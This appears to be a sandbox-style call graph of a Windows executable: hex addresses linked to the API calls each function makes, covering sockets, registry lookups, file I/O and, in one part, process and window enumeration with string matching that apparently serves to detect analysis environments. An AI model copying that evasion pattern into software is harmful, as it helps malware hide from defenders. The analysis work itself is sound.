free 85982->85983 85983->85898 85983->85983 85984->85975 85985 df8d9a LoadLibraryA 85986 df90a0 __acrt_iob_func fwrite 85985->85986 85987 df8df0 GetProcAddress GetProcAddress 85985->85987 85988 df9031 85986->85988 85989 df8e2e 85987->85989 85990 df90d8 __acrt_iob_func fwrite FreeLibrary 85987->85990 85991 df9222 85988->85991 85992 df9042 85988->85992 85989->85990 85996 df8e36 85989->85996 85990->85988 85993 de8f70 8 API calls 85991->85993 85994 df9227 __acrt_iob_func fwrite 85993->85994 85995 df8ff8 __acrt_iob_func fwrite FreeLibrary 85995->85988 85996->85995 85997 df9120 __acrt_iob_func fwrite FreeLibrary 85996->85997 85998 df8ebc 85996->85998 85997->85988 85998->85995 85999 a7d5e0 86000 a7d652 WSAStartup 85999->86000 86003 a7d5f0 85999->86003 86001 a7d664 86000->86001 86002 a7d670 86000->86002 86002->86003 86004 a7d67c WSACleanup 86002->86004 86005 a7d606 GetProcAddress 86003->86005 86006 a7d61b 86003->86006 86005->86006 86007 a7d616 86005->86007 86008 a7d636 QueryPerformanceFrequency 86006->86008 86007->86006 86009 be47b0 86035 c3e5d0 strlen MultiByteToWideChar 86009->86035 86012 be47df 86048 bdd520 14 API calls 86012->86048 86013 be4824 86049 c17120 13 API calls 86013->86049 86016 be4829 86050 c17220 13 API calls 86016->86050 86017 be47ed 86019 be488d fclose 86017->86019 86022 be47f8 86017->86022 86019->86022 86020 be483a GetLastError 86051 c17310 13 API calls 86020->86051 86023 be4852 _errno 86024 be486b 86023->86024 86025 be4860 _errno 86023->86025 86052 c17120 13 API calls 86024->86052 86025->86024 86026 be4898 86025->86026 86054 c17120 13 API calls 86026->86054 86029 be4870 86053 c17220 13 API calls 86029->86053 86030 be489d 86055 c17220 13 API calls 86030->86055 86032 be4881 86056 c17310 13 API calls 86032->86056 86036 c3e6b0 GetLastError 86035->86036 86039 c3e608 86035->86039 86037 c3e6e2 GetLastError 86036->86037 86038 c3e6bd MultiByteToWideChar 86036->86038 86040 be47c4 strchr 86037->86040 86041 c3e6f4 fopen 86037->86041 86038->86037 86038->86039 86042 c3e622 MultiByteToWideChar 86039->86042 86040->86012 86040->86013 86041->86040 86042->86040 86043 c3e649 strlen MultiByteToWideChar 86042->86043 86043->86040 86044 c3e673 _wfopen 86043->86044 86044->86040 86045 c3e685 _errno 86044->86045 86046 c3e6a0 fopen 86045->86046 86047 c3e690 _errno 86045->86047 86046->86040 86047->86040 86047->86046 86048->86017 86049->86016 86050->86020 86051->86023 86052->86029 86053->86032 86054->86030 86055->86032 86056->86022 86057 ded1d0 _errno 86062 ded287 86057->86062 86063 ded3ae 86057->86063 86058 ded340 fputc 86058->86062 86059 ded504 localeconv 86059->86062 86060 deca50 fputc localeconv fputc WideCharToMultiByte _errno 86060->86062 86061 dec9c0 fputc localeconv WideCharToMultiByte _errno 86061->86062 86062->86058 86062->86059 86062->86060 86062->86061 86062->86063 86064 decc90 fputc localeconv WideCharToMultiByte _errno 86062->86064 86064->86062 86065 b170a0 86066 b170ae 86065->86066 86067 b1717f WSAGetLastError 86066->86067 86070 b171a7 86066->86070 86075 b2a8c0 86066->86075 86079 b171c0 27 API calls 86066->86079 86069 b1718b 86067->86069 86069->86070 86080 b16d50 7 API calls 86069->86080 86072 b1719f 86081 b29320 QueryPerformanceFrequency QueryPerformanceCounter closesocket 86072->86081 86076 b2a903 recvfrom 86075->86076 86077 b2a8e6 86075->86077 86078 b2a8ed 86076->86078 86077->86076 86077->86078 86078->86066 86079->86066 86080->86072 86081->86070 86082 b14720 86083 b14728 86082->86083 86084 b14733 86083->86084 86113 b14fe0 86083->86113 86087 b1477d 86089 b14765 86112 b1476c 86089->86112 86118 b28a80 7 API calls 86089->86118 86092 b14791 86092->86112 86119 b1ed80 memset 86092->86119 86093 b14774 86095 b147b0 86095->86112 86120 b1e730 86095->86120 86099 b147d8 86099->86112 86124 b1ed80 memset 86099->86124 86101 b147f7 86101->86112 86125 b1e000 memset _time64 86101->86125 86103 b1480f 86103->86112 86126 b15540 memset 86103->86126 86105 b1482e 86105->86112 86127 b19270 86105->86127 86107 b14860 86136 b14950 86107->86136 86109 b14878 86110 b1486a 86110->86109 86110->86112 86147 b1f5f0 13 API calls 86110->86147 86112->86109 86146 b130a0 24 API calls 86112->86146 86114 b14fec 86113->86114 86115 b14745 86114->86115 86116 b14ff3 memset 86114->86116 86115->86087 86117 b285e0 memset InitializeCriticalSection InitializeConditionVariable DeleteCriticalSection 86115->86117 86116->86115 86117->86089 86118->86092 86119->86095 86121 b14fe0 memset 86120->86121 86122 b147c4 86121->86122 86122->86112 86123 b1e530 memset _time64 86122->86123 86123->86099 86124->86101 86125->86103 86126->86105 86148 b1a440 86127->86148 86129 b19297 86131 b192ab 86129->86131 86221 b286d0 EnterCriticalSection 86129->86221 86131->86107 86132 b192f3 86134 b193d5 86132->86134 86135 b193b1 memcpy 86132->86135 86222 b286f0 LeaveCriticalSection 86134->86222 86135->86134 86137 b14966 86136->86137 86138 b14a14 htonl 86137->86138 86144 b149b9 86137->86144 86145 b149c5 86137->86145 86234 b1b590 memset atoi if_nametoindex if_indextoname 86138->86234 86140 b14aa0 gethostname 86141 b14ab3 WSAGetLastError 86140->86141 86142 b14b35 strchr 86140->86142 86141->86142 86141->86144 86142->86145 86144->86140 86144->86145 86145->86110 86146->86093 86147->86112 86149 b1a46b 86148->86149 86152 b1a48b GetAdaptersAddresses 86149->86152 86156 b1a4db 86149->86156 86151 b1a9fa 86153 b1aa03 RegOpenKeyExA 86151->86153 86178 b1ad14 86151->86178 86180 b1a4a6 86152->86180 86208 b1a53f 86152->86208 86154 b1ab70 RegOpenKeyExA 86153->86154 86155 b1aa27 RegQueryValueExA 86153->86155 86157 b1ab90 RegQueryValueExA 86154->86157 86158 b1ac34 RegOpenKeyExA 86154->86158 86159 b1aa71 86155->86159 86160 b1aacc RegQueryValueExA 86155->86160 86156->86178 86227 b2cb10 GetVersionExA 86156->86227 86161 b1abd2 86157->86161 86162 b1ac26 RegCloseKey 86157->86162 86165 b1ac54 RegQueryValueExA 86158->86165 86166 b1acf8 RegOpenKeyExA 86158->86166 86159->86160 86172 b1aa85 RegQueryValueExA 86159->86172 86163 b1ab66 RegCloseKey 86160->86163 86164 b1ab0e 86160->86164 86161->86162 86181 b1abe2 RegQueryValueExA 86161->86181 86162->86158 86163->86154 86164->86163 86177 b1ab1e RegQueryValueExA 86164->86177 86167 b1ac96 86165->86167 86168 b1acea RegCloseKey 86165->86168 86170 b1ad56 RegEnumKeyExA 86166->86170 86166->86178 86167->86168 86182 b1aca6 RegQueryValueExA 86167->86182 86168->86166 86169 b1a87d qsort 86169->86156 86211 b1a8a0 86169->86211 86173 b1ad9b 86170->86173 86174 b1b15d RegCloseKey 86170->86174 86171 b1a4f3 GetAdaptersAddresses 86175 b1a505 86171->86175 86171->86208 86176 b1aab3 86172->86176 86179 b1ae16 RegOpenKeyExA 86173->86179 86174->86178 86175->86156 86183 b1a527 GetAdaptersAddresses 86175->86183 86176->86160 86184 b1ab5b 86177->86184 86185 b1ab4c 86177->86185 86178->86129 86188 b1ae34 RegQueryValueExA 86179->86188 86189 b1addf RegEnumKeyExA 86179->86189 86180->86156 86180->86171 86186 b1ac1b 86181->86186 86187 b1ac0c 86181->86187 86190 b1acd0 86182->86190 86191 b1acdf 86182->86191 86183->86156 86183->86208 86184->86163 86231 b1b1e0 strlen strncat 86185->86231 86186->86162 86232 b1b1e0 strlen strncat 86187->86232 86196 b1af43 RegQueryValueExA 86188->86196 86212 b1adbc 86188->86212 86189->86179 86195 b1b155 86189->86195 86233 b1b1e0 strlen strncat 86190->86233 86191->86168 86193 b1a8f0 strcmp 86193->86211 86195->86174 86198 b1b052 RegQueryValueExA 86196->86198 86196->86212 86200 b1adc7 RegCloseKey 86198->86200 86198->86212 86199 b1a794 GetBestRoute2 86201 b1d190 SetLastError 86199->86201 86200->86189 86201->86208 86202 b1ae91 RegQueryValueExA 86202->86212 86203 b1afa0 RegQueryValueExA 86203->86212 86204 b1a6c7 GetBestRoute2 86223 b1d190 86204->86223 86205 b1a81e htons 86205->86208 86206 b1b0af RegQueryValueExA 86206->86212 86208->86156 86208->86169 86208->86199 86208->86204 86208->86205 86209 b1b180 8 API calls 86208->86209 86210 b1a746 htons 86208->86210 86209->86208 86210->86208 86211->86156 86211->86193 86213 b1a991 strlen 86211->86213 86214 b1a8b0 strncat 86211->86214 86212->86196 86212->86198 86212->86200 86212->86202 86212->86203 86212->86206 86215 b1af17 strlen 86212->86215 86216 b1af26 strncat 86212->86216 86217 b1b035 strncat 86212->86217 86218 b1b026 strlen 86212->86218 86219 b1b141 strlen 86212->86219 86220 b1adaa strncat 86212->86220 86213->86214 86214->86211 86215->86216 86216->86212 86217->86212 86218->86217 86219->86220 86220->86212 86221->86132 86222->86131 86226 b1d1ae 86223->86226 86224 b1d860 SetLastError 86225 b1d1f3 86224->86225 86225->86208 86226->86224 86226->86225 86228 b2cb6a GetVersionExA 86227->86228 86229 b2cbbb 86227->86229 86228->86229 86230 b2cbd2 86228->86230 86229->86151 86230->86151 86231->86184 86232->86186 86233->86191 86234->86144 86235 b2a920 86236 b2a944 86235->86236 86237 b2a94b 86236->86237 86238 b2a977 send 86236->86238 86239 f43b60 86240 f43b6e 86239->86240 86243 f43b92 86239->86243 86241 f43bac _errno 86240->86241 86242 f43b76 realloc 86240->86242 86241->86243 86242->86243 86245 a63ab0 AcquireSRWLockExclusive 86246 a63ac3 86245->86246 86247 a63acb ReleaseSRWLockExclusive 86245->86247 86246->86247 86248 a63ad6 86246->86248 86249 a63af3 ReleaseSRWLockExclusive 86248->86249 86250 a995b0 86251 a995fd 86250->86251 86252 a995c8 86250->86252 86252->86251 86254 a9a150 86252->86254 86255 a9a15f 86254->86255 86266 a9a246 86254->86266 86256 a9a181 getsockname 86255->86256 86255->86266 86257 a9a1d0 WSAGetLastError 86256->86257 86258 a9a1f7 86256->86258 86267 a7d090 20 API calls 86257->86267 86268 a9ef30 86258->86268 86261 a9a1eb 86276 aa4f40 6 API calls 86261->86276 86262 a9a20f 86263 a9a216 _errno _errno 86262->86263 86262->86266 86275 a7d090 20 API calls 86263->86275 86266->86251 86267->86261 86269 a9efa8 86268->86269 86273 a9ef47 86268->86273 86272 a9efc0 86269->86272 86277 a6c960 strlen memset strlen 86269->86277 86271 a9ef66 _errno 86271->86262 86272->86262 86273->86271 86274 a9ef96 htons 86273->86274 86274->86272 86275->86261 86276->86266 86277->86272 86278 a629ff FindFirstFileA 86279 a62a31 86278->86279 86325 f3e490 strlen 86279->86325 86281 a62a45 86282 f3e520 12 API calls 86281->86282 86283 a62a5c RegOpenKeyExA 86282->86283 86284 a62a93 86283->86284 86285 f3e490 strlen 86284->86285 86286 a62aa7 86285->86286 86287 f3e520 12 API calls 86286->86287 86288 a62abe CharUpperA strstr 86287->86288 86290 a62b0e 86288->86290 86291 f3e490 strlen 86290->86291 86292 a62b22 86291->86292 86293 f3e520 12 API calls 86292->86293 86294 a62b39 CreateToolhelp32Snapshot Process32First 86293->86294 86295 a62b94 86294->86295 86296 a62ba5 QueryFullProcessImageNameA 86294->86296 86295->86296 86298 a62bb0 Process32Next 86295->86298 86299 a62c3b CloseHandle strstr 86296->86299 86298->86295 86298->86296 86300 a62c68 86299->86300 86301 f3e490 strlen 86300->86301 86302 a62c7c 86301->86302 86303 f3e520 12 API calls 86302->86303 86304 a62c93 CreateToolhelp32Snapshot Process32First 86303->86304 86305 a62d99 86304->86305 86306 a62cef strncpy 86304->86306 86307 f3e490 strlen 86305->86307 86308 a62d31 strstr 86306->86308 86309 a62dda 86307->86309 86308->86305 86310 a62d4b strstr 86308->86310 86311 f3e520 12 API calls 86309->86311 86310->86305 86313 a62d65 strstr 86310->86313 86312 a62df1 CloseHandle EnumWindows 86311->86312 86314 a62e30 86312->86314 86313->86305 86315 a62d7f strstr 86313->86315 86317 f3e490 strlen 86314->86317 86315->86305 86316 a62daf Process32Next 86315->86316 86316->86305 86316->86306 86318 a62e44 86317->86318 86319 f3e520 12 API calls 86318->86319 86320 a62e5b 86319->86320 86321 f3e490 strlen 86320->86321 86322 a62ef7 86321->86322 86323 f3e520 12 API calls 86322->86323 86324 a62f0e 86323->86324 86326 a71139 86327 a71148 86326->86327 86332 a71161 86327->86332 86334 a71512 86327->86334 86328 a70f69 86329 a71fb0 86328->86329 86330 a71f58 86328->86330 86338 a70f00 86328->86338 86329->86338 86351 a74940 36 API calls 86329->86351 86349 a70150 strlen memset strlen fwrite fwrite 86330->86349 86332->86328 86347 a70150 strlen memset strlen fwrite fwrite 86332->86347 86334->86328 86348 a722d0 6 API calls 86334->86348 86340 a70f21 86338->86340 86346 a70150 strlen memset strlen fwrite fwrite 86338->86346 86339 a71f61 86341 a71fa6 86339->86341 86350 a9d4d0 strlen memset strlen fwrite fwrite 86339->86350 86341->86338 86341->86340 86352 a675a0 86341->86352 86345 a675a0 4 API calls 86345->86338 86346->86340 86347->86328 86348->86328 86349->86339 86350->86341 86351->86341 86353 a675d4 86352->86353 86354 a675aa 86352->86354 86353->86345 86354->86353 86355 a675c1 86354->86355 86358 a672a0 fwrite strlen memset strlen 86355->86358 86357 a675d1 86357->86353 86358->86357 86359 b17e10 86360 b17e4e 86359->86360 86364 b17e3d 86359->86364 86365 b243d0 86360->86365 86362 b17e7b 86362->86364 86369 b18b50 86362->86369 86366 b243e7 86365->86366 86368 b2441d 86365->86368 86366->86368 86391 b22cb0 memset 86366->86391 86368->86362 86370 b18b60 86369->86370 86372 b18b88 86370->86372 86392 b28e70 86370->86392 86397 b288b0 QueryPerformanceFrequency QueryPerformanceCounter 86372->86397 86374 b18b9a 86390 b18c32 86374->86390 86399 b24530 86374->86399 86376 b18c2b 86377 b18cb5 86376->86377 86376->86390 86429 b18db0 10 API calls 86376->86429 86403 b1e7c0 86377->86403 86381 b18d83 86381->86377 86383 b18d8d 86381->86383 86430 b16e90 memset memset 86383->86430 86385 b18d40 86428 b16e90 memset memset 86385->86428 86386 b18d1a 86411 b16050 86386->86411 86390->86364 86391->86368 86393 b28e80 86392->86393 86394 b28ea7 86392->86394 86431 b28d60 9 API calls 86393->86431 86394->86370 86396 b28e95 86396->86394 86398 b288f2 86397->86398 86398->86374 86400 b2455e 86399->86400 86402 b24572 86399->86402 86432 b24c20 memmove 86400->86432 86402->86376 86404 b1e7db 86403->86404 86406 b18cf2 86403->86406 86405 b14fe0 memset 86404->86405 86405->86406 86406->86385 86407 b1e600 86406->86407 86408 b1e60d 86407->86408 86410 b18d13 86407->86410 86408->86410 86433 b2cd70 memset 86408->86433 86410->86385 86410->86386 86412 b160d9 86411->86412 86434 b2aa30 86412->86434 86416 b164a4 86473 b1f400 memset memset 86416->86473 86418 b16506 86474 b2c320 QueryPerformanceFrequency QueryPerformanceCounter 86418->86474 86419 b164c7 86419->86418 86420 b168df 86419->86420 86423 b16050 25 API calls 86420->86423 86422 b16515 86475 b1f400 memset memset 86422->86475 86424 b168d2 86423->86424 86424->86390 86426 b1652f 86476 b28880 WakeAllConditionVariable 86426->86476 86429->86381 86431->86396 86432->86402 86433->86410 86435 b2aa5f 86434->86435 86436 b1e730 memset 86435->86436 86471 b162fc 86435->86471 86437 b2aa98 86436->86437 86438 b2ab18 htons 86437->86438 86439 b2aabf 86437->86439 86445 b2ab0e 86437->86445 86441 b2ab58 86438->86441 86440 b2aacd htons 86439->86440 86439->86445 86440->86441 86442 b2ab96 socket 86441->86442 86443 b2ab75 86441->86443 86442->86443 86442->86445 86444 b2abd0 ioctlsocket 86443->86444 86443->86445 86462 b2ad2e 86443->86462 86446 b2ac10 86444->86446 86447 b2abef setsockopt 86444->86447 86450 b2ae6e closesocket 86445->86450 86445->86471 86448 b2ac16 setsockopt 86446->86448 86449 b2ac37 86446->86449 86447->86445 86447->86446 86448->86445 86448->86449 86451 b2ac7a 86449->86451 86452 b2ad04 86449->86452 86456 b2ac57 htonl 86449->86456 86450->86471 86453 b2ace7 setsockopt 86451->86453 86457 b2ac9d 86451->86457 86454 b2ad0a setsockopt 86452->86454 86452->86462 86453->86452 86454->86445 86454->86462 86455 b2ada0 connect 86459 b2adb3 WSAGetLastError 86455->86459 86458 b2acc6 bind 86456->86458 86457->86458 86458->86445 86460 b2acdd 86458->86460 86459->86445 86459->86462 86460->86452 86460->86453 86461 b2ade1 86461->86445 86477 b2af70 86461->86477 86462->86445 86462->86455 86462->86459 86462->86461 86465 b2aeaf 86480 b1e760 memset 86465->86480 86466 b2ae9f 86467 b1e7c0 memset 86466->86467 86469 b2aea6 86467->86469 86469->86445 86481 b1e180 memset 86469->86481 86472 b16d50 7 API calls 86471->86472 86472->86416 86473->86419 86474->86422 86475->86426 86476->86424 86478 b2af93 getsockname 86477->86478 86479 b2ae21 86477->86479 86478->86479 86479->86445 86479->86465 86479->86466 86480->86469 86481->86445 86482 a9b3c0 86483 a9b3cb 86482->86483 86484 a9b3ee 86482->86484 86488 a99290 86483->86488 86503 a676a0 86483->86503 86485 a9b3ea 86489 a676a0 38 API calls 86488->86489 86490 a992e5 86489->86490 86491 a993c3 WSAGetLastError 86490->86491 86495 a992f3 86490->86495 86492 a993e5 86491->86492 86497 a99392 86491->86497 86517 a7d090 20 API calls 86492->86517 86494 a993f7 86518 aa4f40 6 API calls 86494->86518 86495->86497 86498 a99335 WSAIoctl 86495->86498 86501 a993be 86497->86501 86519 aa50a0 strlen memset strlen fwrite fwrite 86497->86519 86498->86497 86500 a99366 86498->86500 86500->86497 86502 a99371 setsockopt 86500->86502 86501->86485 86502->86497 86504 a676e6 send 86503->86504 86505 a676c0 86503->86505 86507 a676f4 86504->86507 86508 a6775e 86504->86508 86505->86504 86506 a676c9 86505->86506 86509 a676d3 send 86506->86509 86510 a6770b 86506->86510 86520 a672a0 fwrite strlen memset strlen 86507->86520 86508->86485 86509->86507 86521 a672a0 fwrite strlen memset strlen 86510->86521 86512 a67704 86512->86508 86514 a6771c __acrt_iob_func 86522 a6cb20 32 API calls 86514->86522 86516 a6773c fflush _errno 86516->86508 86517->86494 86518->86497 86519->86501 86520->86512 86521->86514 86522->86516 86523 a9e400 86524 a9e412 86523->86524 86530 a9e459 86523->86530 86527 a9e422 86524->86527 86547 ab3030 fwrite strlen memset strlen 86524->86547 86548 ac09d0 fwrite strlen memset strlen 86527->86548 86528 a9e42b 86549 a968b0 12 API calls 86528->86549 86529 a9e4a8 86530->86529 86533 a9e495 86530->86533 86535 a9b5a0 86530->86535 86533->86529 86534 a9b5a0 6 API calls 86533->86534 86534->86529 86536 a9b5d2 86535->86536 86537 a9b5c0 86535->86537 86536->86533 86537->86536 86538 a9b713 86537->86538 86541 a9b626 86537->86541 86551 aa4f40 6 API calls 86538->86551 86540 a9b65a 86540->86536 86542 a9b72b 86540->86542 86543 a9b737 86540->86543 86541->86536 86541->86540 86541->86542 86541->86543 86550 aa50a0 strlen memset strlen fwrite fwrite 86541->86550 86542->86536 86552 aa50a0 strlen memset strlen fwrite fwrite 86542->86552 86543->86536 86553 aa50a0 strlen memset strlen fwrite fwrite 86543->86553 86547->86527 86548->86528 86549->86530 86550->86541 86551->86536 86552->86536 86553->86536 86554 a9b400 86555 a9b40b 86554->86555 86556 a9b425 86554->86556 86559 a67770 86555->86559 86560 a677b6 recv 86559->86560 86561 a67790 86559->86561 86563 a677c4 86560->86563 86564 a6782e 86560->86564 86561->86560 86562 a67799 86561->86562 86565 a677a3 recv 86562->86565 86566 a677db 86562->86566 86573 a672a0 fwrite strlen memset strlen 86563->86573 86565->86563 86574 a672a0 fwrite strlen memset strlen 86566->86574 86568 a677d4 86568->86564 86570 a677ec __acrt_iob_func 86575 a6cb20 32 API calls 86570->86575 86572 a6780c fflush _errno 86572->86564 86573->86568 86574->86570 86575->86572 86576 a9f6c3 86583 a9f6e3 86576->86583 86586 a9f7b9 86576->86586 86577 a9f72e 86578 a9f743 86577->86578 86579 a9f7f4 86577->86579 86581 a9f754 WSASetLastError 86578->86581 86587 a9f764 86578->86587 86580 a9ff1a 86579->86580 86579->86587 86596 aa0c80 fwrite strlen memset strlen 86580->86596 86581->86587 86583->86577 86593 aa50a0 strlen memset strlen fwrite fwrite 86583->86593 86585 a9ff5b 86589 aa0034 86585->86589 86597 aa50a0 strlen memset strlen fwrite fwrite 86585->86597 86586->86583 86586->86587 86595 aa4fd0 strlen memset strlen fwrite fwrite 86586->86595 86591 aa50a0 strlen memset strlen fwrite fwrite 86587->86591 86594 aa0d30 6 API calls 86587->86594 86591->86587 86593->86577 86594->86587 86595->86583 86596->86585 86597->86589 86598 aa0700 86599 aa0719 86598->86599 86610 aa099d 86598->86610 86601 aa09b5 86599->86601 86603 aa09f6 86599->86603 86604 aa0a35 86599->86604 86599->86610 86613 a67310 86599->86613 86625 a8eb30 36 API calls 86599->86625 86626 ac13a0 36 API calls 86599->86626 86627 a8eae0 36 API calls 86599->86627 86601->86610 86628 aa50a0 strlen memset strlen fwrite fwrite 86601->86628 86605 a675a0 4 API calls 86603->86605 86629 aa4f40 6 API calls 86604->86629 86609 aa0a11 86605->86609 86611 a675a0 4 API calls 86609->86611 86611->86610 86614 a67332 86613->86614 86615 a67320 86613->86615 86618 a67366 86614->86618 86619 a67383 86614->86619 86615->86614 86616 a67390 86615->86616 86631 a672a0 fwrite strlen memset strlen 86616->86631 86630 a672a0 fwrite strlen memset strlen 86618->86630 86619->86599 86620 a673a1 __acrt_iob_func 86632 a6cb20 32 API calls 86620->86632 86623 a67380 86623->86619 86624 a673c1 fflush _errno 86624->86619 86625->86599 86626->86599 86627->86599 86628->86610 86629->86610 86630->86623 86631->86620 86632->86624 86633 a613c9 86634 a613d0 86633->86634 86635 a613e3 86634->86635 86636 a611da 86634->86636 86683 de8a20 107 API calls 86635->86683 86637 a611e7 86636->86637 86638 a61460 _initterm 86636->86638 86640 a613fd _initterm 86637->86640 86644 a611ff 86637->86644 86641 a61483 exit 86638->86641 86640->86644 86660 de93e0 86644->86660 86645 a61231 SetUnhandledExceptionFilter _set_invalid_parameter_handler 86674 de9210 86645->86674 86647 a61257 __p__acmdln 86651 a6126e malloc 86647->86651 86649 a61300 86650 a61318 strlen malloc memcpy 86649->86650 86650->86650 86652 a6134e 86650->86652 86651->86641 86651->86649 86675 de9060 86652->86675 86654 a61367 86680 f44030 86654->86680 86667 de9400 86660->86667 86673 de93f3 86660->86673 86661 de9688 86662 de9699 86661->86662 86661->86673 86664 de96c7 86662->86664 86684 de9280 13 API calls 86662->86684 86685 de9220 13 API calls 86664->86685 86666 de96df 86666->86645 86667->86661 86667->86664 86668 de94e2 86667->86668 86671 de95b8 86667->86671 86667->86673 86668->86667 86669 de9280 13 API calls 86668->86669 86670 de9220 13 API calls 86668->86670 86669->86668 86670->86668 86672 de95ea VirtualProtect 86671->86672 86671->86673 86672->86671 86673->86645 86674->86647 86676 de9069 86675->86676 86677 de9000 86675->86677 86676->86654 86686 a614c0 _crt_atexit 86677->86686 86679 de9030 86679->86654 86681 de9060 _crt_atexit 86680->86681 86682 f44066 86681->86682 86682->86682 86683->86637 86684->86662 86685->86666 86686->86679 86687 a631d7 CreateToolhelp32Snapshot 86688 a63223 86687->86688 86694 a63200 86687->86694 86700 f3e130 86688->86700 86691 a632dc CloseHandle 86703 f3e520 86691->86703 86695 a63255 86698 f3e520 12 API calls 86695->86698 86699 a632bc Process32Next 86695->86699 86712 f3e400 7 API calls 86695->86712 86713 f3e490 strlen 86695->86713 86714 f3e330 malloc 86695->86714 86698->86695 86699->86691 86699->86695 86716 f3e150 malloc 86700->86716 86704 f3e53c 86703->86704 86705 f3e55b 86704->86705 86706 f3e588 _strdup 86704->86706 86708 f3e571 86704->86708 86705->86708 86720 f3ebb0 86705->86720 86707 f3e594 86706->86707 86706->86708 86729 f42bc0 7 API calls 86707->86729 86708->86694 86711 f3e5b3 86711->86694 86712->86695 86715 f3e34e 86714->86715 86715->86695 86717 f3e164 86716->86717 86718 a63232 Process32First 86716->86718 86717->86718 86719 f3e1b8 free 86717->86719 86718->86691 86718->86695 86719->86718 86721 f3ebbd 86720->86721 86722 f3ebd5 86721->86722 86723 f3ec08 86721->86723 86724 f3ebe5 86721->86724 86722->86724 86730 f42b20 86722->86730 86723->86724 86725 f3ec0f free 86723->86725 86733 f43bc0 86724->86733 86725->86724 86729->86711 86731 f42b4f free 86730->86731 86732 f42b30 86730->86732 86732->86731 86734 f43bcc free 86733->86734 86735 f3ebf0 free 86733->86735 86734->86735 86735->86708 86736 a62f17 86737 f3e130 2 API calls 86736->86737 86738 a62f2c 86737->86738 86739 f3e520 12 API calls 86738->86739 86743 a62f49 86739->86743 86740 a631d3 86741 a62fb3 RegOpenKeyExA 86741->86743 86742 a6315c RegEnumKeyExA 86742->86743 86743->86740 86743->86741 86743->86742 86744 a63046 RegOpenKeyExA 86743->86744 86744->86743 86745 a63089 RegQueryValueExA 86744->86745 86746 a6313b RegCloseKey 86745->86746 86751 a630d6 86745->86751 86746->86743 86749 f3e520 12 API calls 86749->86751 86750 f3e330 malloc 86750->86751 86751->86746 86751->86749 86751->86750 86752 f3e400 7 API calls 86751->86752 86753 f3e490 strlen 86751->86753 86752->86751 86754 b2b180 86756 b2b19b 86754->86756 86765 b2b2e3 86754->86765 86755 b2b3e8 _assert 86757 b2b41d 86755->86757 86773 b2b468 86755->86773 86756->86755 86759 b2b315 qsort 86756->86759 86764 b2b2f0 WSAGetLastError 86756->86764 86756->86765 86770 b2b2a9 getsockname 86756->86770 86772 b2b020 closesocket 86756->86772 86774 b2af30 86756->86774 86778 b2b060 86756->86778 86758 b2b433 86757->86758 86788 b2b590 htonl 86757->86788 86789 b2b590 htonl 86758->86789 86759->86765 86763 b2b43f 86769 b2b456 86763->86769 86790 b2b590 htonl 86763->86790 86764->86756 86764->86765 86765->86765 86791 b2b590 htonl 86769->86791 86783 b2b020 86770->86783 86772->86756 86775 b2af63 socket 86774->86775 86776 b2af4c 86774->86776 86775->86756 86776->86775 86777 b2af52 86776->86777 86777->86756 86782 b2b080 86778->86782 86779 b2b0b0 connect 86780 b2b0bf WSAGetLastError 86779->86780 86781 b2b0ea 86780->86781 86780->86782 86781->86756 86782->86779 86782->86780 86782->86781 86784 b2b052 86783->86784 86785 b2b029 86783->86785 86784->86756 86786 b2b04b closesocket 86785->86786 86787 b2b03e 86785->86787 86786->86784 86787->86756 86788->86758 86789->86763 86790->86769 86791->86773 86792 b2a080 86795 b29740 86792->86795 86794 b2a09b 86796 b29780 86795->86796 86801 b2975d 86795->86801 86797 b29914 memset RegOpenKeyExA 86796->86797 86798 b29788 getenv 86796->86798 86799 b2995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 86797->86799 86806 b29812 86797->86806 86800 b2979b 86798->86800 86799->86800 86802 b297a6 _stat64 86800->86802 86800->86806 86801->86798 86801->86802 86801->86806 86803 b297c7 86802->86803 86808 b2980b 86802->86808 86804 b297e2 _time64 86803->86804 86805 b297f6 _stricmp 86803->86805 86804->86805 86805->86808 86806->86794 86808->86806 86828 b277b0 86808->86828 86810 b14fe0 memset 86811 b29896 86810->86811 86811->86806 86812 b298a1 _time64 86811->86812 86813 b298bb 86812->86813 86813->86806 86839 b1e2d0 memset _time64 86813->86839 86815 b298d3 86815->86806 86840 b1e2d0 memset _time64 86815->86840 86817 b26320 memcpy 86825 b298e8 86817->86825 86818 b1d120 14 API calls 86818->86825 86819 b1d190 SetLastError 86819->86825 86820 b14fe0 memset 86820->86825 86822 b1e730 memset 86822->86825 86823 b26d60 memcmp 86823->86825 86824 b1e3c0 memset 86824->86825 86825->86806 86825->86817 86825->86818 86825->86819 86825->86820 86825->86822 86825->86823 86825->86824 86826 b29c3d _stricmp 86825->86826 86827 b1e7c0 memset 86825->86827 86841 b1e760 memset 86825->86841 86826->86825 86827->86825 86829 b27827 86828->86829 86830 b277d7 fopen 86828->86830 86829->86806 86829->86810 86831 b277e9 fseek 86830->86831 86832 b2780e GetLastError 86830->86832 86833 b27801 fclose 86831->86833 86834 b2782f ftell 86831->86834 86832->86829 86833->86829 86834->86833 86835 b2783c fseek 86834->86835 86835->86833 86836 b2784f 86835->86836 86837 b2787a 86836->86837 86838 b27866 fread 86836->86838 86837->86833 86838->86833 86838->86837 86839->86815 86840->86825 86841->86825 86842 f42e00 calloc 86843 f42e25 calloc 86842->86843 86844 f42e40 86842->86844 86843->86844 86845 f42e9c free 86843->86845 86845->86844 86846 a63d5e 86849 a63d30 86846->86849 86848 a63d90 86849->86846 86849->86848 86850 a70ab0 86849->86850 86853 a705b0 86850->86853 86854 a707c7 86853->86854 86855 a705bd 86853->86855 86854->86849 86855->86854 86856 a7066a 86855->86856 86864 a707ce 86855->86864 86900 a703c0 6 API calls 86855->86900 86901 a77450 37 API calls 86855->86901 86856->86864 86866 a706f0 86856->86866 86902 a773b0 37 API calls 86856->86902 86861 a707ef 86865 a70861 WSAWaitForMultipleEvents 86861->86865 86869 a70a2f 86861->86869 86881 a76fa0 86861->86881 86862 a7075f getsockopt 86862->86866 86863 a70707 WSAEventSelect 86863->86864 86863->86866 86903 a77380 fwrite strlen memset strlen 86864->86903 86874 a70854 86865->86874 86866->86861 86866->86862 86866->86863 86868 a676a0 38 API calls 86866->86868 86868->86866 86869->86864 86873 a70a87 86869->86873 86871 a70a19 WSAResetEvent 86871->86869 86872 a708c8 WSAEnumNetworkEvents 86872->86874 86904 a76df0 Sleep WSASetLastError 86873->86904 86874->86872 86875 a70928 WSAEventSelect 86874->86875 86879 a70970 86874->86879 86875->86874 86877 a70a94 86877->86864 86878 a709e8 WSAEnumNetworkEvents 86878->86879 86880 a709d0 WSAEventSelect 86878->86880 86879->86871 86879->86878 86879->86880 86880->86878 86880->86879 86882 